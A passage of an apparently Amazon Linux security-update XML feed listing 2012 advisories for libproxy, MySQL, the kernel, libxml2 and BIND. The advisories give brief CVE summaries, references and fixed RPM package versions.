CVE-2012-4466 ruby: safe level bypass via name_err_mesg_to_str()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4466" title="" id="CVE-2012-4466" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ruby-libs" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-libs-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-debuginfo-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby-devel" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-devel-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby-ri" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-ri-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby-static" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-static-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-debuginfo-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby-devel" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-devel-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby-ri" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-ri-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby-irb" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-irb-1.8.7.371-1.20.amzn1.noarch.rpm</filename></package><package name="ruby-libs" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-libs-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby-static" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-static-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby-rdoc" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-rdoc-1.8.7.371-1.20.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-140</id><title>Amazon Linux - ALAS-2012-140: medium priority package update for libproxy</title><issued date="2012-11-20 06:25:00" /><updated date="2014-09-14 17:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-4505:
Heap-based buffer overflow in the px_pac_reload function in lib/pac.c in libproxy 0.2.x and 0.3.x allows remote servers to have an unspecified impact via a crafted Content-Length size in an HTTP response header for a proxy.pac file request, a different vulnerability than CVE-2012-4504.
A buffer overflow flaw was found in the way libproxy handled the downloading of proxy auto-configuration (PAC) files. A malicious server hosting a PAC file or a man-in-the-middle attacker could use this flaw to cause an application using libproxy to crash or, possibly, execute arbitrary code, if the proxy settings obtained by libproxy (from the environment or the desktop environment settings) instructed the use of a PAC proxy configuration.
864612:
CVE-2012-4505 libproxy: PAC handling insufficient content length check leading to buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4505" title="" id="CVE-2012-4505" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1461.html" title="" id="RHSA-2012:1461" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libproxy-bin" version="0.3.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libproxy-bin-0.3.0-3.7.amzn1.i686.rpm</filename></package><package name="libproxy-devel" version="0.3.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libproxy-devel-0.3.0-3.7.amzn1.i686.rpm</filename></package><package name="libproxy-python" version="0.3.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libproxy-python-0.3.0-3.7.amzn1.i686.rpm</filename></package><package name="libproxy-debuginfo" version="0.3.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libproxy-debuginfo-0.3.0-3.7.amzn1.i686.rpm</filename></package><package name="libproxy" version="0.3.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libproxy-0.3.0-3.7.amzn1.i686.rpm</filename></package><package name="libproxy-python" version="0.3.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libproxy-python-0.3.0-3.7.amzn1.x86_64.rpm</filename></package><package name="libproxy" version="0.3.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libproxy-0.3.0-3.7.amzn1.x86_64.rpm</filename></package><package name="libproxy-bin" version="0.3.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libproxy-bin-0.3.0-3.7.amzn1.x86_64.rpm</filename></package><package name="libproxy-devel" version="0.3.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libproxy-devel-0.3.0-3.7.amzn1.x86_64.rpm</filename></package><package name="libproxy-debuginfo" version="0.3.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libproxy-debuginfo-0.3.0-3.7.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-141</id><title>Amazon Linux - ALAS-2012-141: important priority package update for mysql51</title><issued date="2012-11-20 06:26:00" /><updated date="2014-09-14 17:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1688:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability, related to Server DML.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages, listed in the References section.
814285:
CVE-2012-1688 mysql: unspecified DoS vulnerability related to DML (CPU Apr 2012)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1688" title="" id="CVE-2012-1688" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1462.html" title="" id="RHSA-2012:1462" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql51-bench" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.66" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.66-1.56.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.66-1.56.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.66" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.66-1.56.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-142</id><title>Amazon Linux - ALAS-2012-142: medium priority package update for kernel</title><issued date="2012-11-20 06:34:00" /><updated date="2014-09-14 17:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-4565:
871848:
CVE-2012-4565 kernel: net: divide by zero in tcp algorithm illinois
* A divide-by-zero flaw was found in the TCP Illinois congestion control algorithm implementation in the Linux kernel. If the TCP Illinois congestion control algorithm were in use (the sysctl net.ipv4.tcp_congestion_control variable set to "illinois"), a local, unprivileged user could trigger this flaw and cause a denial of service.
CVE-2012-4508:
869904:
CVE-2012-4508 kernel: ext4: AIO vs fallocate stale data exposure
* A race condition in the way asynchronous I/O and fallocate() interacted when using ext4 could allow a local, unprivileged user to obtain random data from a deleted file.
CVE-2012-3511:
Multiple race conditions in the madvise_remove function in mm/madvise.c in the Linux kernel before 3.4.5 allow local users to cause a denial of service (use-after-free and system crash) via vectors involving a (1) munmap or (2) close system call.
849734:
CVE-2012-3511 kernel: mm: use-after-free in madvise_remove()
* A use-after-free flaw was found in the madvise() system call implementation in the Linux kernel. A local, unprivileged user could use this flaw to cause a denial of service or, potentially, escalate their privileges.
CVE-2012-3400:
Heap-based buffer overflow in the udf_load_logicalvol function in fs/udf/super.c in the Linux kernel before 3.4.5 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted UDF filesystem.
843139:
CVE-2012-3400 kernel: udf: buffer overflow when parsing sparing table
* Buffer overflow flaws were found in the udf_load_logicalvol() function in the Universal Disk Format (UDF) file system implementation in the Linux kernel. An attacker with physical access to a system could use these flaws to cause a denial of service or escalate their privileges.
CVE-2012-2133:
Use-after-free vulnerability in the Linux kernel before 3.3.6, when huge pages are enabled, allows local users to cause a denial of service (system crash) or possibly gain privileges by interacting with a hugetlbfs filesystem, as demonstrated by a umount operation that triggers improper handling of quota data.
817430:
CVE-2012-2133 kernel: use after free bug in "quota" handling
* A use-after-free flaw was found in the Linux kernel's memory management subsystem in the way quota handling for huge pages was performed. A local, unprivileged user could use this flaw to cause a denial of service or, potentially, escalate their privileges.
CVE-2012-1568:
804947:
CVE-2012-1568 kernel: execshield: predictable ascii armour base address
* It was found that when running a 32-bit binary that uses a large number of shared libraries, one of the libraries would always be loaded at a predictable address in memory. An attacker could use this flaw to bypass the Address Space Layout Randomization (ASLR) security feature.
CVE-2012-0957:
862877:
CVE-2012-0957 kernel: uts: stack memory leak in UNAME26
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0957" title="" id="CVE-2012-0957" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1568" title="" id="CVE-2012-1568" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2133" title="" id="CVE-2012-2133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3400" title="" id="CVE-2012-3400" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3511" title="" id="CVE-2012-3511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4508" title="" id="CVE-2012-4508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4565" title="" id="CVE-2012-4565" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1426.html" title="" id="RHSA-2012:1426" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.34" release="55.46.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.34-55.46.amzn1.noarch.rpm</filename></package><package name="kernel-devel" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.34" release="55.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.34-55.46.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.34-55.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.34" release="55.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.34-55.46.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-143</id><title>Amazon Linux - ALAS-2012-143: important priority package update for libxml2</title><issued date="2012-12-06 21:22:00" /><updated date="2014-09-14 17:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5134:
Heap-based buffer underflow in the xmlParseAttValueComplex function in parser.c in libxml2 2.9.0 and earlier, as used in Google Chrome before 23.0.1271.91, allows remote attackers to cause a denial of service or possibly execute arbitrary code via crafted entities in an XML document.
A heap-based buffer underflow flaw was found in the way libxml2 decoded certain entities. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
880466:
CVE-2012-5134 libxml2: Heap-buffer-underflow in xmlParseAttValueComplex
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5134" title="" id="CVE-2012-5134" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1512.html" title="" id="RHSA-2012:1512" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libxml2-python" version="2.7.8" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.7.8-10.25.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.8" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.7.8-10.25.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.8" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.7.8-10.25.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.8" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.7.8-10.25.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.7.8-10.25.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.8" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.7.8-10.25.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.8" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.7.8-10.25.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.7.8" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.7.8-10.25.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.7.8" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.7.8-10.25.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.7.8-10.25.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-144</id><title>Amazon Linux - ALAS-2012-144: important priority package update for mysql55</title><issued date="2012-12-06 21:24:00" /><updated date="2014-09-14 17:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5611:
Stack-based buffer overflow in MySQL 5.5.19, 5.1.53, and possibly other versions, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
A stack-based buffer overflow flaw was found in the user permission checking code in MySQL. An authenticated database user could use this flaw to crash the mysqld daemon or, potentially, execute arbitrary code with the privileges of the user running the mysqld daemon.
881064:
CVE-2012-5611 mysql: acl_get() stack-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611" title="" id="CVE-2012-5611" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1551.html" title="" id="RHSA-2012:1551" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql55-embedded-devel" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-common" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-common-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.28" release="2.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.28-2.26.amzn1.i686.rpm</filename></package><package name="mysql55-common" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-common-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.28-2.26.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.28" release="2.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.28-2.26.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-145</id><title>Amazon Linux - ALAS-2012-145: important priority package update for mysql51</title><issued date="2012-12-06 21:25:00" /><updated date="2014-09-14 17:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5611:
Stack-based buffer overflow in MySQL 5.5.19, 5.1.53, and possibly other versions, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
A stack-based buffer overflow flaw was found in the user permission checking code in MySQL. An authenticated database user could use this flaw to crash the mysqld daemon or, potentially, execute arbitrary code with the privileges of the user running the mysqld daemon.
881064:
CVE-2012-5611 mysql: acl_get() stack-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611" title="" id="CVE-2012-5611" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1551.html" title="" id="RHSA-2012:1551" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql51-bench" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.66" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.66-1.57.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.66-1.57.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.66" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.66-1.57.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-146</id><title>Amazon Linux - ALAS-2012-146: important priority package update for bind</title><issued date="2012-12-07 09:28:00" /><updated date="2014-09-14 17:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5688:
ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
A flaw was found in the DNS64 implementation in BIND. If a remote attacker sent a specially-crafted query to a named server, named could exit unexpectedly with an assertion failure. Note that DNS64 support is not enabled by default.
883533:
CVE-2012-5688 bind: DoS on servers using DNS64
